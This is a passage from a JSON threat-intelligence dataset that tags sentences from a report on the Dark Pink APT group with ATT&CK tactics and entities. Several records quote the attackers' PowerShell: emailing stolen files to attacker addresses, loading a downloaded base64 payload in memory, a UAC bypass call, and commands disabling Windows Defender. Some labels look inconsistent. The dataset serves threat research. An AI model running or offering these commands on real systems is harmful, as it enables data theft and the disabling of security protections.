"entities": null }, { "uid": "aptnotes-08_aptnotes_report-p14-s122-d8b08a", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 14, "sentence_id": 122, "context_before": "Github account.", "sentence_text": "There are three files inside this archive:\nDism.exe, Dism.sys, and Dismcore.dll.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p14-s123-b8ddc2", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 14, "sentence_id": 123, "context_before": "There are three files inside this archive:\nDism.exe, Dism.sys, and Dismcore.dll.", "sentence_text": "The first of these files is a legitimate file with a valid digital signature.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p14-s124-3d2b30", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 14, "sentence_id": 124, "context_before": "The first of these files is a legitimate file with a valid digital signature.", "sentence_text": "The functionality of the DLL file is to unpack the original executable from file Dism.sys.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p14-s125-3d491f", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 14, "sentence_id": 125, "context_before": "The functionality of the DLL file is to unpack the original executable from file Dism.sys.", "sentence_text": "Archive is extracted to %tmp% folder.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Extract archive to %tmp% folder.", "entities": [ { "text": "is extracted to %tmp% folder", "start": 8, "end": 36, "label": "Action" }, { "text": "%tmp%", "start": 24, "end": 29, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-08_aptnotes_report-p14-s126-bba75c", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 14, "sentence_id": 126, "context_before": "Archive is extracted to %tmp% folder.", "sentence_text": "The files are then copied to the USB device, where a new folder named “dism” is created.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1570", "name": "Lateral Tool Transfer" }, { "id": "T1106", "name": "Native API" } ], "procedure": "Copy files to USB device and create dism folder.", "entities": [ { "text": "copied to the USB device", "start": 19, "end": 43, "label": "Action" }, { "text": "is created", "start": 77, "end": 87, "label": "Action" }, { "text": "USB device", "start": 33, "end": 43, "label": "Infrastructure_Indicator" }, { "text": "dism", "start": 71, "end": 75, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-08_aptnotes_report-p14-s127-ada8ab", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 14, "sentence_id": 127, "context_before": "The files are then copied to the USB device, where a new folder named “dism” is created.", "sentence_text": "The folder attribution is changed to hidden and system.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1564.001", "name": "Hidden Files and Directories" } ], "procedure": "Change folder attributes to hidden and system.", "entities": [ { "text": "is changed to hidden and system", "start": 23, "end": 54, "label": "Action" } ] }, { "uid": "aptnotes-08_aptnotes_report-p14-s128-365846", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 14, "sentence_id": 128, "context_before": "The folder attribution is changed to hidden and system.", "sentence_text": "A file named system.bat is created, containing a command to launch Dism.exe 5.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" }, { "id": "T1547", "name": "Boot or Logon Autostart Execution" } ], "procedure": "Create system.bat file to launch Dism.exe.", "entities": [ { "text": "is created, containing a command to launch Dism.exe", "start": 24, "end": 75, "label": "Action" }, { "text": "system.bat", "start": 13, "end": 23, "label": "MalwareTool" }, { "text": "Dism.exe", "start": 67, "end": 75, "label": "MalwareTool" } ] }, { "uid": "aptnotes-08_aptnotes_report-p14-s129-83ccf0", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 14, "sentence_id": 129, "context_before": "A file named system.bat is created, containing a command to launch Dism.exe 5.", "sentence_text": "Finally, as many LNK files are created as there are folders on the USB drive.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036.005", "name": "Masquerading: Match Legitimate Name or Location" } ], "procedure": "Create LNK files for folders on the USB drive.", "entities": [ { "text": "LNK files are created as there are folders on the USB drive", "start": 17, "end": 76, "label": "Action" }, { "text": "LNK files", "start": 17, "end": 26, "label": "Infrastructure_Indicator" }, { "text": "USB drive", "start": 67, "end": 76, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-08_aptnotes_report-p14-s130-6c6c3f", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 14, "sentence_id": 130, "context_before": "Finally, as many LNK files are created as there are folders on the USB drive.", "sentence_text": "The attributes of the original folder are changed to hidden and system.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1564.001", "name": "Hidden Files and Directories" } ], "procedure": "Change folder attributes to hidden and system.", "entities": [ { "text": "are changed to hidden and system", "start": 38, "end": 70, "label": "Action" } ] }, { "uid": "aptnotes-08_aptnotes_report-p14-s131-0f7bd9", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 14, "sentence_id": 131, "context_before": "The attributes of the original folder are changed to hidden and system.", "sentence_text": "A LNK file is created with a command to open the hidden folder in explorer.exe and launch system.bat.", "relevant": "yes", "tactic": [ { "name": "Execution", "id": "TA0002" } ], "techniques": [ { "name": "Command and Scripting Interpreter", "id": "T1059" } ], "procedure": "A LNK file is created to execute commands that open a folder and launch a script.", "entities": [ { "text": "is created", "start": 11, "end": 21, "label": "Action" }, { "text": "launch system.bat", "start": 83, "end": 100, "label": "Action" } ] }, { "uid": "aptnotes-08_aptnotes_report-p15-s133-d03f8f", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 15, "sentence_id": 133, "context_before": "14/29", "sentence_text": "Following this process, the user will see LNK files bearing the same name as folders found on the USB device.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p15-s134-a9ec63", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 15, "sentence_id": 134, "context_before": "Following this process, the user will see LNK files bearing the same name as folders found on the USB device.", "sentence_text": "Once the user opens this malicious LNK file, TeleBotDropper will be launched by the DLL Side-Loading technique (the functionalities of TeleBotDropper have been already shown in the previous section).", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1574.002", "name": "DLL Side-Loading" } ], "procedure": "Launch TeleBotDropper via DLL side-loading.", "entities": [ { "text": "will be launched by the DLL Side-Loading technique", "start": 60, "end": 110, "label": "Action" }, { "text": "TeleBotDropper", "start": 45, "end": 59, "label": "MalwareTool" } ] }, { "uid": "aptnotes-08_aptnotes_report-p15-s135-b79027", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 15, "sentence_id": 135, "context_before": "Once the user opens this malicious LNK file, TeleBotDropper will be launched by the DLL Side-Loading technique (the functionalities of TeleBotDropper have been already shown in the previous section).", "sentence_text": "It is imperative to remember that this solution works if there is only one folder on the USB device.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p15-s136-27135c", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 15, "sentence_id": 136, "context_before": "It is imperative to remember that this solution works if there is only one folder on the USB device.", "sentence_text": "An example of how this works in more detail is provided in APPENDIX B.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p15-s137-4c2b31", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 15, "sentence_id": 137, "context_before": "An example of how this works in more detail is provided in APPENDIX B.", "sentence_text": "The mechanism of creating LNK files in place of the original files is also used for network sharing.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p15-s138-ffff58", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 15, "sentence_id": 138, "context_before": "The mechanism of creating LNK files in place of the original files is also used for network sharing.", "sentence_text": "Data exfiltration\nAs is the case with many other attacks of this kind, the threat actors exfiltrate data through ZIP archives.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1560", "name": "Archive Collected Data" } ], "procedure": "Exfiltrate data through ZIP archives.", "entities": [ { "text": "exfiltrate data through ZIP archives", "start": 89, "end": 125, "label": "Action" }, { "text": "ZIP archives", "start": 113, "end": 125, "label": "MalwareTool" } ] }, { "uid": "aptnotes-08_aptnotes_report-p15-s139-9b2d66", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 15, "sentence_id": 139, "context_before": "Data exfiltration\nAs is the case with many other attacks of this kind, the threat actors exfiltrate data through ZIP archives.", "sentence_text": "However, the collection and sending process operate separately from one another.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p15-s140-c3e9ed", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 15, "sentence_id": 140, "context_before": "However, the collection and sending process operate separately from one another.", "sentence_text": "After this step is completed, the $env:tmp\\backuplog1 directory is deleted.", "relevant": "yes", "tactic": [ { "name": "Defense Evasion", "id": "TA0005" } ], "techniques": [ { "name": "Indicator Removal on Host", "id": "T1070" } ], "procedure": "The directory is deleted to remove artifacts from the system.", "entities": [ { "text": "is deleted", "start": 64, "end": 74, "label": "Action" }, { "text": "$env:tmp\\backuplog1", "start": 34, "end": 53, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-08_aptnotes_report-p15-s141-0e7f03", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 15, "sentence_id": 141, "context_before": "After this step is completed, the $env:tmp\\backuplog1 directory is deleted.", "sentence_text": "Dark Pink threat actors can also leverage their self-made stealers Cucky and Ctealer to draw data from infected machines.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p15-s142-438e07", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 15, "sentence_id": 142, "context_before": "Dark Pink threat actors can also leverage their self-made stealers Cucky and Ctealer to draw data from infected machines.", "sentence_text": "The functionalities of both of these stealers are the same.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p15-s143-9b63bf", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 15, "sentence_id": 143, "context_before": "The functionalities of both of these stealers are the same.", "sentence_text": "The stealers themselves do not require any internet connection, as they save the result of the execution (stolen data) to files.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p15-s144-f265e6", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 15, "sentence_id": 144, "context_before": "The stealers themselves do not require any internet connection, as they save the result of the execution (stolen data) to files.", "sentence_text": "Both of the stealers can be downloaded from the threat actors’", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p15-s145-ee895e", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 15, "sentence_id": 145, "context_before": "Both of the stealers can be downloaded from the threat actors’", "sentence_text": "Github account automatically by commands issued by the malware.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p15-s146-7ac55a", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 15, "sentence_id": 146, "context_before": "Github account automatically by commands issued by the malware.", "sentence_text": "An example of the script used to launch Cucky is shown in APPENDIX C.\nIn total, Group-IB researchers discovered that Dark Pink exfiltrated files via three separate pathways.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p15-s147-801395", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 15, "sentence_id": 147, "context_before": "An example of the script used to launch Cucky is shown in APPENDIX C.\nIn total, Group-IB researchers discovered that Dark Pink exfiltrated files via three separate pathways.", "sentence_text": "The first of these pathways sees the threat actors use Telegram to receive files.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" }, { "id": "T1567", "name": "Exfiltration Over Web Service" } ], "procedure": "Use Telegram to receive files from infected systems.", "entities": [ { "text": "use Telegram to receive files", "start": 51, "end": 80, "label": "Action" }, { "text": "Telegram", "start": 55, "end": 63, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-08_aptnotes_report-p15-s148-489ad9", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 15, "sentence_id": 148, "context_before": "The first of these pathways sees the threat actors use Telegram to receive files.", "sentence_text": "As a device is infected, information is collected in a specific folder by the malware and sent via Telegram by a special command.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Collects information in a folder and sends it via Telegram upon command.", "entities": [ { "text": "the malware", "start": 74, "end": 85, "label": "ThreatActor" }, { "text": "is collected in a specific folder by the malware and sent via Telegram by a special command", "start": 37, "end": 128, "label": "Action" }, { "text": "Telegram", "start": 99, "end": 107, "label": "Infrastructure_Indicator" }, { "text": "a specific folder", "start": 53, "end": 70, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-08_aptnotes_report-p15-s149-08e12a", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 15, "sentence_id": 149, "context_before": "As a device is infected, information is collected in a specific folder by the malware and sent via Telegram by a special command.", "sentence_text": "An example of a script that carries out this process can be found in APPENDIX D. In addition to Telegram, Group-IB found evidence that the threat actors exfiltrated files via Dropbox.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1567", "name": "Exfiltration Over Web Service" } ], "procedure": "Exfiltrate files via Dropbox.", "entities": [ { "text": "exfiltrated files via Dropbox", "start": 153, "end": 182, "label": "Action" }, { "text": "Dropbox", "start": 175, "end": 182, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-08_aptnotes_report-p15-s150-da64fa", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 15, "sentence_id": 150, "context_before": "An example of a script that carries out this process can be found in APPENDIX D.\nIn addition to Telegram, Group-IB found evidence that the threat actors exfiltrated files via Dropbox.", "sentence_text": "This method is slightly different to the one used to exfiltrate via Telegram, as it involves a series of PowerShell scripts that transfer files from a specific folder to a Dropbox account by performing a HTTP request with a hardcoded token.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1567", "name": "Exfiltration Over Web Service" }, { "id": "T1048", "name": "Exfiltration Over Alternative Protocol" } ], "procedure": "Transfer files from a local folder to a Dropbox account via HTTP request using a hardcoded token.", "entities": [ { "text": "transfer files from a specific folder to a Dropbox account", "start": 129, "end": 187, "label": "Action" }, { "text": "performing a HTTP request with a hardcoded token", "start": 191, "end": 239, "label": "Action" }, { "text": "PowerShell scripts", "start": 105, "end": 123, "label": "MalwareTool" }, { "text": "Dropbox account", "start": 172, "end": 187, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-08_aptnotes_report-p16-s152-4f19e6", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 16, "sentence_id": 152, "context_before": "15/29", "sentence_text": "One particular attack discovered by Group-IB was of particular surprise to us.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p16-s153-6df29e", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 16, "sentence_id": 153, "context_before": "One particular attack discovered by Group-IB was of particular surprise to us.", "sentence_text": "Despite the device being controlled by commands issued by a threat actor-controlled Telegram channel via Telegram bots, some interesting files were sent via email.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" }, { "id": "T1048", "name": "Exfiltration Over Alternative Protocol" } ], "procedure": "Control infected device via Telegram channel and send files via email.", "entities": [ { "text": "controlled by commands issued by a threat actor-controlled Telegram channel via Telegram bots", "start": 25, "end": 118, "label": "Action" }, { "text": "sent via email", "start": 148, "end": 162, "label": "Action" }, { "text": "Telegram channel", "start": 84, "end": 100, "label": "Infrastructure_Indicator" }, { "text": "Telegram bots", "start": 105, "end": 118, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-08_aptnotes_report-p16-s154-6bb091", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 16, "sentence_id": 154, "context_before": "Despite the device being controlled by commands issued by a threat actor-controlled Telegram channel via Telegram bots, some interesting files were sent via email.", "sentence_text": "An example of this command is shown below.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p16-s155-fd0a95", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 16, "sentence_id": 155, "context_before": "An example of this command is shown below.", "sentence_text": "$filepath=\"$env:tmp/backuplog\";\n$cred = New-Object System.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p16-s158-8c243b", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 16, "sentence_id": 158, "context_before": "Management.", "sentence_text": "PSCredential (\"lanhuong.jsc@outlook.com\",(ConvertTo-SecureString \"CHANGED\" -AsPlainText -Force));\nSend-MailMessage -To \"blackpink.301@outlook[.]com\" -From \"blackred.113@outlook[.]com\" -Body \"hello badboy\" -SmtpServer \"smtp-mail.outlook.com\" -Port 587 -Subject \"$env:computername\" -UseSsl -Credential $cred -Attachments (gci $filepath).fullname The list of emails used during data exfiltration are shown below:\nblackpink.301@outlook[.]com\nalibaba.113@outlook[.]com\nalibaba.113@outlook[.]com.vn\nblackred.113@outlook[.]com\nlanhuong.jsc@outlook[.]com\nnphuongmai.97@outlook[.]com\nAt this stage, Group-IB researchers believe that the exfiltration method of choice depends on the potential restrictions set out in the victim’s network infrastructure.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p16-s159-ef849e", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 16, "sentence_id": 159, "context_before": "PSCredential (\"lanhuong.jsc@outlook.com\",(ConvertTo-SecureString \"CHANGED\" -AsPlainText -Force));\nSend-MailMessage -To \"blackpink.301@outlook[.]com\" -From \"blackred.113@outlook[.]com\" -Body \"hello badboy\" -SmtpServer \"smtp-mail.outlook.com\" -Port 587 -Subject \"$env:computername\" -UseSsl -Credential $cred -Attachments (gci $filepath).fullname The list of emails used during data exfiltration are shown below:\nblackpink.301@outlook[.]com\nalibaba.113@outlook[.]com\nalibaba.113@outlook[.]com.vn\nblackred.113@outlook[.]com\nlanhuong.jsc@outlook[.]com\nnphuongmai.97@outlook[.]com\nAt this stage, Group-IB researchers believe that the exfiltration method of choice depends on the potential restrictions set out in the victim’s network infrastructure.", "sentence_text": "Evasion techniques\nDuring their attacks, the threat actors used an already known technique to bypass User Account Control (UAC) to alter the settings in Windows Defender.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1548", "name": "Abuse Elevation Control Mechanism" } ], "procedure": "Bypass UAC to modify Windows Defender settings.", "entities": [ { "text": "the threat actors", "start": 41, "end": 58, "label": "ThreatActor" }, { "text": "used an already known technique to bypass User Account Control (UAC) to alter the settings in Windows Defender", "start": 59, "end": 169, "label": "Action" } ] }, { "uid": "aptnotes-08_aptnotes_report-p16-s160-5eb347", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 16, "sentence_id": 160, "context_before": "Evasion techniques\nDuring their attacks, the threat actors used an already known technique to bypass User Account Control (UAC) to alter the settings in Windows Defender.", "sentence_text": "They did this by elevating the COM interface.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1548", "name": "Abuse Elevation Control Mechanism" } ], "procedure": "Elevate COM interface to bypass protections and gain higher privileges.", "entities": [ { "text": "elevating the COM interface", "start": 17, "end": 44, "label": "Action" } ] }, { "uid": "aptnotes-08_aptnotes_report-p16-s161-3fe1b8", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 16, "sentence_id": 161, "context_before": "They did this by elevating the COM interface.", "sentence_text": "The methods used are not unique and different implementations were found in different programming languages.\n16/29", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p17-s162-86c71b", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 17, "sentence_id": 162, "context_before": "The methods used are not unique and different implementations were found in different programming languages.\n16/29", "sentence_text": "The settings are changed by a special PowerShell script which is received as a command, and implemented in .NET application.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.001", "name": "PowerShell" } ], "procedure": "Execute PowerShell command to modify system settings.", "entities": [ { "text": "changed by a special PowerShell script", "start": 17, "end": 55, "label": "Action" }, { "text": "received as a command", "start": 65, "end": 86, "label": "Action" }, { "text": "PowerShell", "start": 38, "end": 48, "label": "MalwareTool" } ] }, { "uid": "aptnotes-08_aptnotes_report-p17-s163-38feed", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 17, "sentence_id": 163, "context_before": "The settings are changed by a special PowerShell script which is received as a command, and implemented in .NET application.", "sentence_text": "This command comes in the form of an executable file (in base64 view) that is automatically downloaded from Github upon infection.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Download executable payload from GitHub during infection.", "entities": [ { "text": "downloaded from Github upon infection", "start": 92, "end": 129, "label": "Action" }, { "text": "Github", "start": 108, "end": 114, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-08_aptnotes_report-p17-s164-fe2316", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 17, "sentence_id": 164, "context_before": "This command comes in the form of an executable file (in base64 view) that is automatically downloaded from Github upon infection.", "sentence_text": "The executable does not gain persistence nor is it saved on an infected system.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p17-s165-be6a98", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 17, "sentence_id": 165, "context_before": "The executable does not gain persistence nor is it saved on an infected system.", "sentence_text": "The executable does not persist and is not saved into an infected system.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p17-s166-208b93", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 17, "sentence_id": 166, "context_before": "The executable does not persist and is not saved into an infected system.", "sentence_text": "An example of downloading and launching are shown below.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p17-s167-80ddfa", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 17, "sentence_id": 167, "context_before": "An example of downloading and launching are shown below.", "sentence_text": "[Reflection.Assembly]::Load([System.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p17-s168-0840a1", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 17, "sentence_id": 168, "context_before": "[Reflection.Assembly]::Load([System.", "sentence_text": "Convert]::FromBase64String((New-Object\nSystem.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p17-s169-7068fb", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 17, "sentence_id": 169, "context_before": "Convert]::FromBase64String((New-Object\nSystem.", "sentence_text": "Net.WebClient).DownloadString(URL)));", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p17-s170-d14e0c", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 17, "sentence_id": 170, "context_before": "Net.WebClient).DownloadString(URL)));", "sentence_text": "[NETLUA.Main]::BypassUAC(\"powershell\\\", \"-c {$command}\")", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1548.002", "name": "Abuse Elevation Control Mechanism: Bypass User Account Control" } ], "procedure": "The malware invokes a function to bypass UAC and execute PowerShell commands with elevated privileges.", "entities": [ { "text": "BypassUAC", "start": 15, "end": 24, "label": "Action" }, { "text": "powershell", "start": 26, "end": 36, "label": "MalwareTool" } ] }, { "uid": "aptnotes-08_aptnotes_report-p17-s171-a69bfc", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 17, "sentence_id": 171, "context_before": "[NETLUA.Main]::BypassUAC(\"powershell\\\", \"-c {$command}\")", "sentence_text": "The PowerShell command to modify Windows Defender Settings is passed as an argument and is shown as follows:\nSet-MpPreference -DisableArchiveScanning $true -ea 0;\nSet-MpPreference -DisableBehaviorMonitoring $true -Force -ea 0;\nSet-MpPreference -DisableCatchupFullScan $true -Force -ea 0;\nSet-MpPreference -DisableCatchupQuickScan $true -Force -ea 0;\nSet-MpPreference -DisableIntrusionPreventionSystem", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p17-s172-db3cbe", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 17, "sentence_id": 172, "context_before": "The PowerShell command to modify Windows Defender Settings is passed as an argument and is shown as follows:\nSet-MpPreference -DisableArchiveScanning $true -ea 0;\nSet-MpPreference -DisableBehaviorMonitoring $true -Force -ea 0;\nSet-MpPreference -DisableCatchupFullScan $true -Force -ea 0;\nSet-MpPreference -DisableCatchupQuickScan $true -Force -ea 0;\nSet-MpPreference -DisableIntrusionPreventionSystem", "sentence_text": "$true -Force -ea 0;\nSet-MpPreference -DisableIOAVProtection $true -Force -ea 0;\nSet-MpPreference -DisableRealtimeMonitoring $true -Force -ea 0;\nSet-MpPreference -DisableRemovableDriveScanning $true -Force -ea 0;\nSet-MpPreference -DisableRestorePoint $true -Force -ea 0;\nSet-MpPreference -DisableScanningMappedNetworkDrivesForFullScan $true -Force -ea 0;\nSet-MpPreference -DisableScanningNetworkFiles", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p17-s173-daa916", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 17, "sentence_id": 173, "context_before": "$true -Force -ea 0;\nSet-MpPreference -DisableIOAVProtection $true -Force -ea 0;\nSet-MpPreference -DisableRealtimeMonitoring $true -Force -ea 0;\nSet-MpPreference -DisableRemovableDriveScanning $true -Force -ea 0;\nSet-MpPreference -DisableRestorePoint $true -Force -ea 0;\nSet-MpPreference -DisableScanningMappedNetworkDrivesForFullScan $true -Force -ea 0;\nSet-MpPreference -DisableScanningNetworkFiles", "sentence_text": "$true -Force -ea 0;\nSet-MpPreference -DisableScriptScanning $true -Force -ea 0;\nSet-MpPreference -EnableControlledFolderAccess", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p17-s174-f55672", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 17, "sentence_id": 174, "context_before": "$true -Force -ea 0;\nSet-MpPreference -DisableScriptScanning $true -Force -ea 0;\nSet-MpPreference -EnableControlledFolderAccess", "sentence_text": "Disabled -Force -ea 0;\nSet-MpPreference -EnableNetworkProtection", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p17-s175-5e799d", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 17, "sentence_id": 175, "context_before": "Disabled -Force -ea 0;\nSet-MpPreference -EnableNetworkProtection", "sentence_text": "AuditMode -Force -ea 0;\nSet-MpPreference -MAPSReporting Disabled -Force -ea 0;\nSet-MpPreference -SubmitSamplesConsent NeverSend -Force -ea 0;\nSet-MpPreference -PUAProtection", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p17-s176-3164fc", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 17, "sentence_id": 176, "context_before": "AuditMode -Force -ea 0;\nSet-MpPreference -MAPSReporting Disabled -Force -ea 0;\nSet-MpPreference -SubmitSamplesConsent NeverSend -Force -ea 0;\nSet-MpPreference -PUAProtection", "sentence_text": "Disabled -Force -ea 0", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p17-s177-93dfdd", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 17, "sentence_id": 177, "context_before": "Disabled -Force -ea 0", "sentence_text": "The PowerShell commands will be executed using the .NET application as a tool for privilege escalation.", "relevant": "yes", "tactic": [ { "name": "Privilege Escalation", "id": "TA0004" } ], "techniques": [ { "name": "Command and Scripting Interpreter: PowerShell", "id": "T1059.001" } ], "procedure": "PowerShell commands are executed through a 